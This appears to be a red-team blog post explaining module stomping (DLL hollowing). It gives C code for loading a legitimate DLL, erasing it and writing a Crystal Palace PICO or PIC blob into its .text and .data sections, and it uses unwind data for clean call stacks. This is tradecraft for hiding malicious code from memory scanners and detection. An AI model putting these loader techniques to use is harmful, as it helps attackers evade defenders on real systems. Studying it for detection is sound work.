Module Stomping PIC
Module stomping (aka module overloading or DLL hollowing) is a technique for hiding malicious code within a process's memory. It essentially works by loading a legitimate DLL into memory and then overwriting its content. This helps the code appear to be a trusted, signed module backed by a file on disk, rather than injected into unbacked, private memory.
APIs like LoadLibraryEx and NtCreateSection/NtMapViewOfSection are some ways to achieve this. The following is an example of the latter:
BOOL loadDll( LPCWSTR dllPath, PVOID * module )
{
NTSTATUS status = 0;
HANDLE hFile = INVALID_HANDLE_VALUE;
HANDLE hSection = NULL;
PVOID baseAddress = NULL;
SIZE_T viewSize = 0;
hFile = KERNEL32$CreateFileW( dllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );
if ( hFile == INVALID_HANDLE_VALUE ) {
return FALSE;
}
status = NTDLL$NtCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile );
KERNEL32$CloseHandle( hFile );
if ( ! NT_SUCCESS( status ) ) {
return FALSE;
}
status = NTDLL$NtMapViewOfSection( hSection, (HANDLE)-1, &baseAddress, 0, 0, NULL, &viewSize, 2, 0, PAGE_READWRITE );
NTDLL$NtClose( hSection );
if ( ! NT_SUCCESS( status ) || !baseAddress ) {
return FALSE;
}
* module = baseAddress;
return TRUE;
}
Once a module has been loaded, its memory permissions can be changed to RW and the current headers and sections erased.
/* parse DLL's headers */
DLLDATA module_data;
ParseDLL( (char *)module_base, &module_data );
/* erase the address space */
DWORD old_protect;
KERNEL32$VirtualProtect( module_base, SizeOfDLL( &module_data ), PAGE_READWRITE, &old_protect );
memset( module_base, 0, SizeOfDLL ( &module_data ) );
Then another DLL can be written in its place, and its relocations and imports processed.
/* load dll into the module's address space */
LoadDLL( &dll_data, dll_src, module_base );
/* handle imports */
IMPORTFUNCS funcs;
funcs.LoadLibraryA = LoadLibraryA;
funcs.GetProcAddress = GetProcAddress;
ProcessImports( &funcs, &dll_data, module_base );
/* fix module permissions */
fixModulePermissions( &dll_data, module_base );
And finally, its entry point is called.
/* call entry point */
DLLMAIN_FUNC entry = EntryPoint( &dll_data, module_base );
entry( (HINSTANCE)module_base, DLL_PROCESS_ATTACH, NULL );
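The fixModulePermissions helper is not shown in this post. As a rough sketch of the idea, assuming it walks the new DLL's section headers and calls VirtualProtect once per section, the core decision is how to turn a section's Characteristics flags into a page protection. The function name sectionProtection is hypothetical, and the constants are defined locally (with the values from winnt.h) so the snippet compiles without the Windows headers.

```c
#include <stdint.h>

/* Section characteristic flags, values as defined by the PE format. */
#ifndef IMAGE_SCN_MEM_EXECUTE
#define IMAGE_SCN_MEM_EXECUTE 0x20000000u
#define IMAGE_SCN_MEM_READ    0x40000000u
#define IMAGE_SCN_MEM_WRITE   0x80000000u
#endif

/* Page protection constants, values as defined in winnt.h. */
#ifndef PAGE_NOACCESS
#define PAGE_NOACCESS          0x01u
#define PAGE_READONLY          0x02u
#define PAGE_READWRITE         0x04u
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#endif

/* Hypothetical helper: map a section's Characteristics to a page protection. */
uint32_t sectionProtection( uint32_t characteristics )
{
    int x = ( characteristics & IMAGE_SCN_MEM_EXECUTE ) != 0;
    int r = ( characteristics & IMAGE_SCN_MEM_READ )    != 0;
    int w = ( characteristics & IMAGE_SCN_MEM_WRITE )   != 0;

    if ( x ) {
        if ( w ) return PAGE_EXECUTE_READWRITE;
        if ( r ) return PAGE_EXECUTE_READ;
        return PAGE_EXECUTE;
    }

    if ( w ) return PAGE_READWRITE;
    if ( r ) return PAGE_READONLY;

    return PAGE_NOACCESS;
}
```

A typical .text section (0x60000020) maps to PAGE_EXECUTE_READ and a typical .data section (0xC0000040) to PAGE_READWRITE, so the stomped module only ends up with RWX pages if one of its sections is itself marked both writable and executable.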
With a lot of capabilities moving to position-independent code (PIC), I was curious to see if a module stomping strategy still makes sense when you're not stomping a DLL over another DLL.
PICOs
Position-Independent Code Objects (PICOs) are Crystal Palace's convention for running COFFs in memory. As the PE structure is based on COFF, COFFs have many of the same sections as a PE does - .text, .data, .rdata, etc. Crystal Palace only retains the data and code sections and throws everything else away.
The vanilla way to load a PICO is to allocate memory for the two sections and call its entry point or an exported function.
/* get pico appended to the loader */
char * pico_src = GETRESOURCE( __PICODATA__ );
/* alloc memory for data and code sections */
char * pico_data = KERNEL32$VirtualAlloc( NULL, PicoDataSize ( pico_src ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
char * pico_code = KERNEL32$VirtualAlloc( NULL, PicoCodeSize ( pico_src ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
/* load the pico into memory */
IMPORTFUNCS funcs;
funcs.LoadLibraryA = LoadLibraryA;
funcs.GetProcAddress = GetProcAddress;
PicoLoad( &funcs, pico_src, pico_code, pico_data );
/* make code section RX */
DWORD old_protect;
KERNEL32$VirtualProtect( pico_code, PicoCodeSize ( pico_src ), PAGE_EXECUTE_READ, &old_protect );
/* call its entry point */
PICOMAIN_FUNC entry = PicoEntryPoint( pico_src, pico_code );
entry( NULL );
Calls to VirtualAlloc, HeapAlloc, etc., create private, unbacked regions. A stomping approach means you could overwrite the .text and .data sections of a DLL instead. We can do this by walking the PE sections until we find the two sections of interest, recording their virtual addresses and sizes, and then overwriting them in memory.
DWORD text_va = 0;
DWORD text_vs = 0;
DWORD data_va = 0;
DWORD data_vs = 0;
/* find .text and .data sections */
getSectionByName( ".text", &module_data, &text_va, &text_vs );
getSectionByName( ".data", &module_data, &data_va, &data_vs );
/* get pico appended to the loader */
char * pico_src = GETRESOURCE( __PICODATA__ );
/* make .text section RW */
DWORD old_protect;
KERNEL32$VirtualProtect( module_base + text_va, text_vs, PAGE_READWRITE, &old_protect );
/* load the pico into memory */
IMPORTFUNCS funcs;
funcs.LoadLibraryA = LoadLibraryA;
funcs.GetProcAddress = GetProcAddress;
PicoLoad( &funcs, pico_src, module_base + text_va, module_base + data_va );
/* make .text section RX */
KERNEL32$VirtualProtect( module_base + text_va, text_vs, PAGE_EXECUTE_READ, &old_protect );
/* call its entry point */
PICOMAIN_FUNC entry = PicoEntryPoint( pico_src, module_base + text_va );
entry( NULL );
PIC
Crystal Palace structures PIC a little differently than a PICO. The blob begins with its executable code and any data is appended to the end. All of the associated code<->data plumbing is done at link-time, rather than at runtime as with a PICO (PicoLoad in LibTCG handles that).
Crystal Palace PIC has a convention for restoring access to global variables via the fixbss command. The TCG PIC example looks for slack RW space and uses that for the .bss data. Instead of slack space, my thought was to stomp PIC into the .text section of a DLL and use its RW .data section for .bss instead.
char * getBSS( DWORD length )
{
MEMORY_BASIC_INFORMATION mbi = { 0 };
KERNEL32$VirtualQuery( ( LPCVOID ) getBSS, &mbi, sizeof ( mbi ) );
char * dll_base = ( char * ) mbi.AllocationBase;
DWORD va = 0;
DWORD vs = 0;
DLLDATA dll_data;
ParseDLL( dll_base, &dll_data );
getSectionByName( ".data", &dll_data, &va, &vs );
if ( vs < length )
{
/* too bad */
return NULL;
}
return dll_base + va;
}
Since this implementation uses the DLL headers to find the various sections, it wouldn't work if those had been erased.
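The snippets above lean on getSectionByName, which isn't shown. The following is a minimal sketch of the same lookup, not the actual helper: the name findSection and its signature are hypothetical, and it takes the mapped image base directly rather than a DLLDATA structure. It reads the header fields at their documented PE offsets instead of using the winnt.h structs, so it builds without the Windows headers, and it assumes a little-endian host.

```c
#include <stdint.h>
#include <string.h>

/* unaligned-safe reads (assumes a little-endian host, as on x86/x64) */
static uint16_t rd16( const unsigned char * p ) { uint16_t v; memcpy( &v, p, sizeof v ); return v; }
static uint32_t rd32( const unsigned char * p ) { uint32_t v; memcpy( &v, p, sizeof v ); return v; }

/* Hypothetical stand-in for getSectionByName: returns 1 and fills va/vs on a match. */
int findSection( const unsigned char * base, const char * name, uint32_t * va, uint32_t * vs )
{
    /* DOS header: "MZ" magic, e_lfanew at offset 0x3C */
    if ( rd16( base ) != 0x5A4D )
        return 0;

    const unsigned char * nt = base + rd32( base + 0x3C );

    /* NT headers: "PE\0\0" signature followed by the 20-byte file header */
    if ( rd32( nt ) != 0x00004550 )
        return 0;

    uint16_t count    = rd16( nt + 4 + 2 );   /* NumberOfSections */
    uint16_t opt_size = rd16( nt + 4 + 16 );  /* SizeOfOptionalHeader */

    /* section table follows the optional header, 40 bytes per entry */
    const unsigned char * sec = nt + 4 + 20 + opt_size;

    /* section names are 8 bytes, NUL-padded, not necessarily NUL-terminated */
    char   want[ 8 ] = { 0 };
    size_t len       = strlen( name );

    if ( len > sizeof want )
        return 0;

    memcpy( want, name, len );

    for ( uint16_t i = 0; i < count; i++, sec += 40 ) {
        if ( memcmp( sec, want, sizeof want ) == 0 ) {
            *vs = rd32( sec + 8 );    /* VirtualSize */
            *va = rd32( sec + 12 );   /* VirtualAddress */
            return 1;
        }
    }

    return 0;
}
```

The va/vs pair it returns is what feeds the vs < length check in getBSS, and the same check is worth making before stomping a PICO's code and data over .text and .data. Because the walk starts at the DOS header, it fails cleanly (returns 0) on a module whose headers have been zeroed.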
Unwind data
This section is the bulk of the update to this post as I didn't feel like writing a whole new one. Shortly after the original post, Crystal Palace got an update, making unwind data available in both PIC and PICOs.
PIC
Crystal Palace's convention for appending data to PIC is via gcc's section attributes. We generally use this to append a DLL or PICO to a loader, e.g. char __PICODATA__[ 0 ] __attribute__(( section( "pico" ) )); but you can append anything you like in a spec file. This means you can define a section like: char __UNWINDDATA__[ 0 ] __attribute__(( section( "unwind_data" ) )); and then add the following to the spec file: linkpost "unwind_data" "unwind". This will append .pdata/.xdata as _RESOURCE structures, which are now included in tcg.h.
PICOs
With the make object +unwind command, Crystal Palace will pack .pdata/.xdata into the PICO before it's appended to a loader. There's also a new function in tcg.h called PicoGetUnwindData that's used to recover it: _RESOURCE * pico_pdata = (_RESOURCE *)PicoGetUnwindData( pico_src, pico_code );.
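For context on what that recovered data is used for: on x64, .pdata is an array of RUNTIME_FUNCTION entries sorted by start address, and the unwinder finds the entry covering a given instruction pointer to locate its unwind info in .xdata. The following is a minimal sketch of that lookup, assuming the recovered bytes are a standard x64 .pdata table. How Crystal Palace lays the data out inside the _RESOURCE is not covered here, and the names PDATA_ENTRY and lookupUnwindEntry are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Same field layout as an x64 RUNTIME_FUNCTION entry in .pdata (all RVAs). */
typedef struct {
    uint32_t BeginAddress;   /* first byte of the function */
    uint32_t EndAddress;     /* one past the last byte of the function */
    uint32_t UnwindData;     /* UNWIND_INFO for the function, in .xdata */
} PDATA_ENTRY;

/* Binary search a table sorted by BeginAddress for the entry covering rva. */
const PDATA_ENTRY * lookupUnwindEntry( const PDATA_ENTRY * table, size_t count, uint32_t rva )
{
    size_t lo = 0;
    size_t hi = count;

    while ( lo < hi ) {
        size_t mid = lo + ( hi - lo ) / 2;

        if ( rva < table[ mid ].BeginAddress )
            hi = mid;
        else if ( rva >= table[ mid ].EndAddress )
            lo = mid + 1;
        else
            return &table[ mid ];
    }

    /* no entry covers this address */
    return NULL;
}
```

An address with no covering entry returns NULL, which mirrors why code without unwind data tends to produce truncated or odd-looking call stacks.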
Conclusion
Unwind data is particularly useful when combined with module stomping because it helps provide clean call stacks without the need for complicated spoofing techniques. When I first wrote this post, I drafted a section lamenting how cool unwind data would be with PIC but ultimately left it out. Little did I know Raffi had already solved it.
